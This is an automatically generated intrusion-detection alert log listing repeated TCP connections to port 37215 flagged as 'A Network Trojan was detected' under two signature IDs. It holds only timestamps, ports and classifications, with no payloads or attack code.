                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032977
                SID:2835222
                Source Port:59146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445594
                SID:2835222
                Source Port:60704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070330
                SID:2829579
                Source Port:33746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573838
                SID:2829579
                Source Port:58856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069640
                SID:2835222
                Source Port:49486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985443
                SID:2835222
                Source Port:36224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179582
                SID:2835222
                Source Port:38880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901153
                SID:2835222
                Source Port:47810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141314
                SID:2835222
                Source Port:52440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883879
                SID:2829579
                Source Port:47352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597917
                SID:2829579
                Source Port:36616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265650
                SID:2835222
                Source Port:47950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613983
                SID:2835222
                Source Port:37516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443294
                SID:2829579
                Source Port:39806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162339
                SID:2829579
                Source Port:40552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990517
                SID:2829579
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161274
                SID:2835222
                Source Port:52928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178869
                SID:2829579
                Source Port:41166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765069
                SID:2835222
                Source Port:39070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558008
                SID:2829579
                Source Port:48224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947277
                SID:2829579
                Source Port:49414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844665
                SID:2829579
                Source Port:33826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765666
                SID:2829579
                Source Port:42408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948711
                SID:2835222
                Source Port:33858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900645
                SID:2835222
                Source Port:50302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335279
                SID:2829579
                Source Port:53922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668746
                SID:2829579
                Source Port:44192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184850
                SID:2835222
                Source Port:47104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026472
                SID:2829579
                Source Port:49076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231035
                SID:2835222
                Source Port:58246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.817102
                SID:2835222
                Source Port:34780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957662
                SID:2829579
                Source Port:45102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518899
                SID:2835222
                Source Port:33468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618747
                SID:2835222
                Source Port:49232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472075
                SID:2829579
                Source Port:37666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434996
                SID:2835222
                Source Port:36862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797904
                SID:2835222
                Source Port:56224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236668
                SID:2829579
                Source Port:49500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586154
                SID:2829579
                Source Port:43828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979427
                SID:2835222
                Source Port:42184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990011
                SID:2835222
                Source Port:58620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557962
                SID:2835222
                Source Port:46052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739638
                SID:2835222
                Source Port:44814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714434
                SID:2829579
                Source Port:50238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362635
                SID:2829579
                Source Port:37972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275409
                SID:2829579
                Source Port:43620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.029697
                SID:2829579
                Source Port:49680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435845
                SID:2829579
                Source Port:42170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928121
                SID:2835222
                Source Port:53290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785507
                SID:2835222
                Source Port:46800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361487
                SID:2835222
                Source Port:50742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660847
                SID:2835222
                Source Port:44098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111255
                SID:2835222
                Source Port:59046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180084
                SID:2829579
                Source Port:56754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824583
                SID:2835222
                Source Port:45222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898143
                SID:2835222
                Source Port:49890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520590
                SID:2829579
                Source Port:39682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475193
                SID:2829579
                Source Port:35596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.657717
                SID:2835222
                Source Port:60588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914904
                SID:2829579
                Source Port:43708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794965
                SID:2835222
                Source Port:54212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925783
                SID:2835222
                Source Port:38926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265743
                SID:2835222
                Source Port:52452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766979
                SID:2829579
                Source Port:39164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315786
                SID:2835222
                Source Port:32852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807060
                SID:2835222
                Source Port:44834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968466
                SID:2835222
                Source Port:58066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169332
                SID:2829579
                Source Port:49780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165484
                SID:2829579
                Source Port:51620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380842
                SID:2829579
                Source Port:53774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522913
                SID:2835222
                Source Port:34448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.336022
                SID:2829579
                Source Port:47764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617257
                SID:2835222
                Source Port:43076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919155
                SID:2829579
                Source Port:54108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508660
                SID:2835222
                Source Port:35330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787678
                SID:2835222
                Source Port:45182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731995
                SID:2829579
                Source Port:34812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967499
                SID:2835222
                Source Port:54498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038607
                SID:2829579
                Source Port:43920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503457
                SID:2835222
                Source Port:60982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652012
                SID:2829579
                Source Port:60390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360564
                SID:2829579
                Source Port:48116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655185
                SID:2835222
                Source Port:33874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535265
                SID:2829579
                Source Port:59768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654702
                SID:2835222
                Source Port:57692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560037
                SID:2829579
                Source Port:41876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844055
                SID:2835222
                Source Port:48626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655789
                SID:2829579
                Source Port:33154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654723
                SID:2829579
                Source Port:37460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223351
                SID:2829579
                Source Port:52894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782478
                SID:2835222
                Source Port:36794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574643
                SID:2835222
                Source Port:41104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421169
                SID:2835222
                Source Port:55430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826218
                SID:2835222
                Source Port:39414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261558
                SID:2835222
                Source Port:57380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437116
                SID:2835222
                Source Port:40334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910910
                SID:2835222
                Source Port:38524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506952
                SID:2829579
                Source Port:48604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936514
                SID:2829579
                Source Port:47738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264906
                SID:2829579
                Source Port:33998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975255
                SID:2835222
                Source Port:54860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810448
                SID:2829579
                Source Port:34944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824556
                SID:2835222
                Source Port:49402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.042976
                SID:2829579
                Source Port:58150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208069
                SID:2835222
                Source Port:53448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928061
                SID:2829579
                Source Port:35366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263874
                SID:2829579
                Source Port:52316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733042
                SID:2829579
                Source Port:42602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873100
                SID:2829579
                Source Port:40098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873051
                SID:2829579
                Source Port:54984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945462
                SID:2835222
                Source Port:46496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614195
                SID:2835222
                Source Port:44446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415107
                SID:2835222
                Source Port:49320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684576
                SID:2829579
                Source Port:58242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653813
                SID:2835222
                Source Port:54430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464542
                SID:2835222
                Source Port:52584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265601
                SID:2829579
                Source Port:33126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834527
                SID:2835222
                Source Port:36726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166246
                SID:2835222
                Source Port:59742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859604
                SID:2835222
                Source Port:46868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363396
                SID:2835222
                Source Port:49510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023121
                SID:2835222
                Source Port:47404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942680
                SID:2829579
                Source Port:57712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207653
                SID:2829579
                Source Port:55508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184397
                SID:2829579
                Source Port:45708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445958
                SID:2835222
                Source Port:59232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901417
                SID:2835222
                Source Port:57552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931931
                SID:2829579
                Source Port:48654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225662
                SID:2829579
                Source Port:53262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.946979
                SID:2829579
                Source Port:52422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811038
                SID:2829579
                Source Port:50454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.985515
                SID:2835222
                Source Port:46890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836530
                SID:2835222
                Source Port:43500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667822
                SID:2835222
                Source Port:39532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223430
                SID:2835222
                Source Port:36536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013755
                SID:2829579
                Source Port:57486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982478
                SID:2835222
                Source Port:49710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024754
                SID:2835222
                Source Port:40494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180518
                SID:2829579
                Source Port:56988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329105
                SID:2835222
                Source Port:44730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624580
                SID:2835222
                Source Port:46424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735789
                SID:2829579
                Source Port:55750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574670
                SID:2835222
                Source Port:47950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262141
                SID:2835222
                Source Port:54160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667780
                SID:2829579
                Source Port:40352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897643
                SID:2829579
                Source Port:49254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764214
                SID:2835222
                Source Port:59918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281484
                SID:2835222
                Source Port:49678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982684
                SID:2829579
                Source Port:37680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949544
                SID:2835222
                Source Port:53364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.899605
                SID:2835222
                Source Port:44622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228186
                SID:2829579
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381681
                SID:2829579
                Source Port:40364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789144
                SID:2835222
                Source Port:56084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927771
                SID:2829579
                Source Port:49306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113313
                SID:2835222
                Source Port:49672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460373
                SID:2835222
                Source Port:45546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035304
                SID:2829579
                Source Port:58818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446694
                SID:2835222
                Source Port:34930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361372
                SID:2835222
                Source Port:37144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.030984
                SID:2835222
                Source Port:60624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463950
                SID:2829579
                Source Port:55260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968530
                SID:2835222
                Source Port:52800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335999
                SID:2835222
                Source Port:37450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556253
                SID:2829579
                Source Port:51890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385130
                SID:2835222
                Source Port:49200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084428
                SID:2829579
                Source Port:41076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.516105
                SID:2829579
                Source Port:33692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038876
                SID:2829579
                Source Port:45536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333785
                SID:2829579
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884151
                SID:2835222
                Source Port:46316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981394
                SID:2835222
                Source Port:43070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667799
                SID:2829579
                Source Port:53528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870485
                SID:2835222
                Source Port:51924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575589
                SID:2835222
                Source Port:60776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135600
                SID:2829579
                Source Port:47676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914355
                SID:2835222
                Source Port:60624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931743
                SID:2829579
                Source Port:58538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166301
                SID:2829579
                Source Port:50244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.043330
                SID:2835222
                Source Port:52986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441462
                SID:2835222
                Source Port:56784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711969
                SID:2829579
                Source Port:35114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165057
                SID:2829579
                Source Port:53674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221276
                SID:2829579
                Source Port:48704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871658
                SID:2835222
                Source Port:49422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097342
                SID:2835222
                Source Port:60934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013453
                SID:2829579
                Source Port:43944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873483
                SID:2829579
                Source Port:58524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977554
                SID:2835222
                Source Port:53292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328545
                SID:2829579
                Source Port:56872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843151
                SID:2829579
                Source Port:60360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617584
                SID:2829579
                Source Port:58086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.818259
                SID:2835222
                Source Port:46116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814454
                SID:2829579
                Source Port:58988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429355
                SID:2835222
                Source Port:50056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730268
                SID:2829579
                Source Port:55036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873540
                SID:2835222
                Source Port:36604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
